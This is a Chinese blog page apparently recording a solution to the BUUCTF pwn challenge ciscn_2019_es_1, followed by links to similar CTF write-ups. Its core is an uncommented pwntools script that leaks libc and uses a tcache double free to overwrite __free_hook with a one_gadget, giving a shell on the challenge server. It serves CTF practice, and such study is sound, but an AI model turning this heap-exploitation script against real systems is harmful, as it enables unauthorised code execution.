BUUCTF刷题记录---ciscn_2019_es_1

最新推荐文章于 2024-07-20 09:08:34 发布
最新推荐文章于 2024-07-20 09:08:34 发布
阅读量98 收藏
点赞数
分类专栏: PWN 网络安全 文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/KaliLinux_V/article/details/128855335
版权 
from pwn import *
from LibcSearcher import *

context(log_level='debug',arch='amd64', os='linux')
pwnfile = "./ciscn_2019_es_1"
io = remote("node4.buuoj.cn",27832)
#io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc-2.27_64.so")

def add(size,name,call):
	io.recvuntil(b"choice:")
	io.sendline(b"1")
	io.recvuntil(b"Please input the size of compary's name")
	io.sendline(str(size))
	io.recvuntil(b"please input name:")
	io.send(name)
	io.recvuntil(b"please input compary call:")
	io.send(call)


def show(idx):
	io.recvuntil(b"choice:")
	io.sendline(b"2")
	io.recvuntil(b"Please input the index:")
	io.sendline(str(idx))

def free(idx):
	io.recvuntil(b"choice:")
	io.sendline(b"3")
	io.recvuntil(b"Please input the index:")
	io.sendline(str(idx))


add(0x410,b"aaaa",b"bbbb")
add(0x60,b"aaaa",b"bbbb")
add(0x60,b"aaaa",b"bbbb")
free(0)
show(0)
io.recvuntil(b"\x3a\n")
libc_addr = u64(io.recv(6).ljust(8,b"\x00"))-96-0x10-libc.sym['__malloc_hook']
gadget = [0x4f2c5,0x4f322,0x10a38c]
one_gadget = libc_addr+gadget[1]
free_hook = libc_addr+libc.sym['__free_hook']
print(hex(libc_addr))
print(hex(free_hook))
print(hex(one_gadget))
free(1)
free(1)
add(0x60,p64(free_hook),b"cccc")
add(0x60,b"a",b"c")
add(0x60,p64(one_gadget),b"c")
free(1)

io.interactive()
saulgoodman-q
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-PWN刷题记录-5(Tcache)
weixin_44145820的博客
04-13 1326
目录ciscn_2019_final_3[V&N2020 公开赛]easyTHeap ciscn_2019_final_3 只有添加和删除两个功能 限制了申请的大小,最大为0x78,意味着chunk最大为0x80,添加完可以泄露堆上的地址 free之后没有置空,可以double free 题目分析差不多就这样,下面是漏洞利用: 先申请一个大小为0x78的heap[0],记录下返回地...
BUUCTF-PWN刷题记录-16
weixin_44145820的博客
05-05 715
目录ciscn_2019_es_5(realloc double free)npuctf_2020_easyheap(off-by-one) ciscn_2019_es_5(realloc double free) 申请没有大小限制,数目上限为10 edit会调用realloc重新申请(其实不会的,因为大小不变) 如果edit就不能show了 看了一下这题没有什么明显漏洞,但是考虑到re...
BUUCTF刷题之路--ciscn_2019_es_21
qq_30528603的博客
11-27 86
我们可以看到s数组在ebp-0x28的位置,但是我们最高只能输入0x30。我们看到数组s的起始位置是ecx的值传递的。ebp中的值是一个栈上的值(old_ebp),这个值对于我们栈迁移是有用的。栈迁移的基本原理其实就是栈的空间不够我们利用。下面的是system的参数,因为我们不能直接调用bin/sh字符串,因此我们布局的时候,需要传地址。既然第一次利用空间不够,那么我们何不把这个栈扩大也就是用整一个s数组的空间来构造rop呢。我们泄露的地址的作用是用来诱导esp指向我们的数组s开始的位置。
BUUCTF-PWN刷题记录-12
weixin_44145820的博客
04-23 661
ciscn_2019_sw_1 一道思路比较独特的格式化字符串漏洞题目 main函数中只有一次利用漏洞的机会 有system的got表项 一个可行思路是把printf的GOT改为system@plt,然后输入/bin/sh,但是考虑到只有一次机会就比较困难 所以我们需要一个能让main多次执行的办法 这时我们只要把main的地址填入finit_array就能无限循环main函数了 简单介绍一...
BUUCTF-PWN刷题记录-8
weixin_44145820的博客
04-16 891
目录roarctf_2019_realloc_magic roarctf_2019_realloc_magic
BUUCTF-pwn刷题记录(22-7-30更新)
Morphy_Amo的博客
03-04 4295
BUUCTF刷题记录
BUUCTF刷题记录(持续更新中~)
热门推荐
xiaolong22333的博客
04-03 5万+
之前陆陆续续做过一些题,但都没有记录,这次打算巩固一下,记录下来。 .
BUUCTF刷题5
m0_51251108的博客
10-30 552
题目:axb_2019_heap:actf_2019_babystack:picoctf_2018_got_shell:[极客大挑战 2019]Not Bad:gyctf_2020_force:picoctf_2018_can_you_gets_me:mrctf2020_easy_equation:wdb_2018_2nd_easyfmt:ciscn_2019_es_1:axb_2019_fmt64: axb_2019_heap: 参考师傅:buuctf axb_2019_heap_R1nd0的博客-CSD
BUUCTF刷题3
m0_51251108的博客
05-26 2746
题目:pwnable_start:wustctf2020_closed:hitcontraining_heapcreator:0ctf_2017_babyheap:ciscn_2019_es_7:jarvisoj_level5:hitcontraining_bamboobox: pwnable_start: 关键词: 汇编,泄露ebp,调试 思路: 1.查看汇编代码得知题目信息,发现read处可0x14后可溢出 2.依靠其中的write,是根据esp来确定打印addr,选择覆盖ret地址为write那里,便
CMA-ES.zip_CMA ES_CMA-ES_CaTlB344ES_cma_cma_matlab
09-24
**CMA-ES算法简介** CMA-ES(Covariance Matrix Adaptation Evolution Strategy)是一种在进化计算领域广泛应用的全局优化算法,特别是在解决高维、非线性、多模态优化问题时表现突出。该算法属于进化策略...
cma.zip_CMA ES_CMA-ES_CMA-ES 算法_cma_es算法
09-24
**CMA-ES算法详解** CMA-ES(Covariance Matrix Adaptation Evolution Strategy)是一种在高维度复杂优化问题中表现优秀的进化策略算法。它的核心思想是通过自适应地调整种群的协方差矩阵来改善搜索过程中的探索与...
Learn-OpenGLES-Tutorials.zip_OpenGLES_opengl_opengl es
09-14
this is source code example opengl es
Elasticsearch-jdbc数据同步配置.zip_elastic-jdbc_elasticsearch_elastics
09-20
**Elasticsearch-jdbc数据同步配置** 在大数据分析和搜索引擎领域,Elasticsearch因其高效、可扩展和实时的搜索能力而被广泛应用。然而,数据往往存储在关系型数据库如MySQL中,为了实现数据的实时或者定期同步到...
固件_S7-1214C_DCDCRLY_6ES7214-1HG40-0XB0_V4.5.1.rar
11-29
标题中的“固件_S7-1214C_DCDCRLY_6ES7214-1HG40-0XB0_V4.5.1.rar”表明这是一个与西门子S7-1214C PLC(可编程逻辑控制器)相关的固件更新文件。S7-1214C是西门子SIMATIC系列中的一款紧凑型PLC,适用于自动化任务,...
Linux -软件安装
z2331198564653的博客
07-18 872
项目开发好需要部署,而项目本身可能依赖其他软件。这时在部署项目时就需要安装依赖的软件。比如: jdk mysql tomcat redis rabbitmq es等。
Linux中的环境变量
qhy850716的博客
07-17 560
我们思考这样一个问题:指令也是可执行程序,我们写好的编译好的c语言也是程序,为什么我们在执行c语言程序时要./a.out带上当前路径,而ls这种指令就不要带路径呢?这就是环境变量PATH的作用,Linux中存在一些全局设置,表明命令行解释器应该去哪个路径下寻找可执行程序。系统中的很多配置在我们登录Linux时就已经被加载到bash中了,也就是内存。
linux学习笔记整理: 关于linux:Shell脚本 2024/7/20;
最新发布
gzx233的博客
07-20 851
Shell脚本的使用
Linux服务器Java环境搭建】010在linux中安装Redis,以及对Redis的配置与远程连接
liuzhenhe1988的专栏
07-19 962
好久没有更新博客了,今天下了班回到家,看到电脑桌上尘封已久的《Spring Boot应用开发实战》,翻开目录想起来之前写的系列【Linux服务器Java环境搭建】还未完结,那就继续吧,今天主要是按linux服务器中安装和配置redis。本系列其他文章,请查看系列【Linux服务器Java环境搭建】
台达PLC_DVP-ES2编程指南:从基础到高级
"这是一本关于台达PLC_DVP-ES2系列的编程手册,包含了全面的操作指导,适合初学者和专业人士使用。" 在深入理解PLC_DVP-ES2编程之前,首先需要掌握PLC的基本原理。PLC(可编程逻辑控制器)的工作基于梯形图,它是一...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值